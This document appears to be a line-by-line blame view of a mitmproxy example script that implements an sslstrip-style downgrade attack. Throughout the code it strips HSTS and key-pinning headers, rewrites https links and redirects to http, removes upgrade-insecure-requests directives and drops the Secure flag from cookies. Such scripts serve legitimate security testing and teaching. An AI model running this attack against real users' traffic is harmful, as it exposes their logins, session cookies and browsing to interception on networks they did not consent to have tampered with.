2016-11-21 01:16:20 +00:00
|
|
|
"""
|
|
|
|
This script implements an sslstrip-like attack based on mitmproxy.
|
|
|
|
https://moxie.org/software/sslstrip/
|
|
|
|
"""
|
2016-01-12 16:41:41 +00:00
|
|
|
import re
|
2018-02-03 20:37:33 +00:00
|
|
|
import urllib.parse
|
|
|
|
import typing # noqa
|
|
|
|
|
|
|
|
from mitmproxy import http
|
2016-01-12 16:41:41 +00:00
|
|
|
|
2016-07-08 01:37:33 +00:00
|
|
|
# set of SSL/TLS capable hosts
|
2018-04-14 23:24:41 +00:00
|
|
|
secure_hosts: typing.Set[str] = set()
|
2016-01-12 16:41:41 +00:00
|
|
|
|
|
|
|
|
2018-02-03 20:37:33 +00:00
|
|
|
def request(flow: http.HTTPFlow) -> None:
|
2016-01-12 16:41:41 +00:00
|
|
|
flow.request.headers.pop('If-Modified-Since', None)
|
|
|
|
flow.request.headers.pop('Cache-Control', None)
|
|
|
|
|
2016-09-26 02:29:26 +00:00
|
|
|
# do not force https redirection
|
|
|
|
flow.request.headers.pop('Upgrade-Insecure-Requests', None)
|
|
|
|
|
2016-05-29 08:23:39 +00:00
|
|
|
# proxy connections to SSL-enabled hosts
|
2016-07-08 01:37:33 +00:00
|
|
|
if flow.request.pretty_host in secure_hosts:
|
2016-01-12 16:41:41 +00:00
|
|
|
flow.request.scheme = 'https'
|
|
|
|
flow.request.port = 443
|
2016-11-09 12:11:31 +00:00
|
|
|
|
|
|
|
# We need to update the request destination to whatever is specified in the host header:
|
|
|
|
# Having no TLS Server Name Indication from the client and just an IP address as request.host
|
|
|
|
# in transparent mode, TLS server name certificate validation would fail.
|
2016-11-08 14:39:24 +00:00
|
|
|
flow.request.host = flow.request.pretty_host
|
2016-01-12 16:41:41 +00:00
|
|
|
|
|
|
|
|
2018-02-03 20:37:33 +00:00
|
|
|
def response(flow: http.HTTPFlow) -> None:
|
2019-11-16 13:56:01 +00:00
|
|
|
assert flow.response
|
2016-09-26 02:29:26 +00:00
|
|
|
flow.response.headers.pop('Strict-Transport-Security', None)
|
|
|
|
flow.response.headers.pop('Public-Key-Pins', None)
|
2016-07-02 09:01:46 +00:00
|
|
|
|
|
|
|
# strip links in response body
|
2016-11-21 01:16:20 +00:00
|
|
|
flow.response.content = flow.response.content.replace(b'https://', b'http://')
|
2016-07-02 09:01:46 +00:00
|
|
|
|
2016-09-26 02:29:26 +00:00
|
|
|
# strip meta tag upgrade-insecure-requests in response body
|
2019-01-05 22:20:39 +00:00
|
|
|
csp_meta_tag_pattern = br'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
|
2016-09-26 02:29:26 +00:00
|
|
|
flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)
|
|
|
|
|
2016-07-02 09:01:46 +00:00
|
|
|
# strip links in 'Location' header
|
|
|
|
if flow.response.headers.get('Location', '').startswith('https://'):
|
|
|
|
location = flow.response.headers['Location']
|
|
|
|
hostname = urllib.parse.urlparse(location).hostname
|
|
|
|
if hostname:
|
2016-07-16 06:17:57 +00:00
|
|
|
secure_hosts.add(hostname)
|
2016-07-02 09:01:46 +00:00
|
|
|
flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
|
|
|
|
|
2016-09-26 02:29:26 +00:00
|
|
|
# strip upgrade-insecure-requests in Content-Security-Policy header
|
2020-04-10 12:08:40 +00:00
|
|
|
csp_header = flow.response.headers.get('Content-Security-Policy', '')
|
|
|
|
if re.search('upgrade-insecure-requests', csp_header, flags=re.IGNORECASE):
|
2016-09-26 02:29:26 +00:00
|
|
|
csp = flow.response.headers['Content-Security-Policy']
|
2020-04-10 12:08:40 +00:00
|
|
|
new_header = re.sub(r'upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)
|
|
|
|
flow.response.headers['Content-Security-Policy'] = new_header
|
2016-09-26 02:29:26 +00:00
|
|
|
|
2016-07-02 09:01:46 +00:00
|
|
|
# strip secure flag from 'Set-Cookie' headers
|
|
|
|
cookies = flow.response.headers.get_all('Set-Cookie')
|
|
|
|
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
|
|
|
|
flow.response.headers.set_all('Set-Cookie', cookies)
|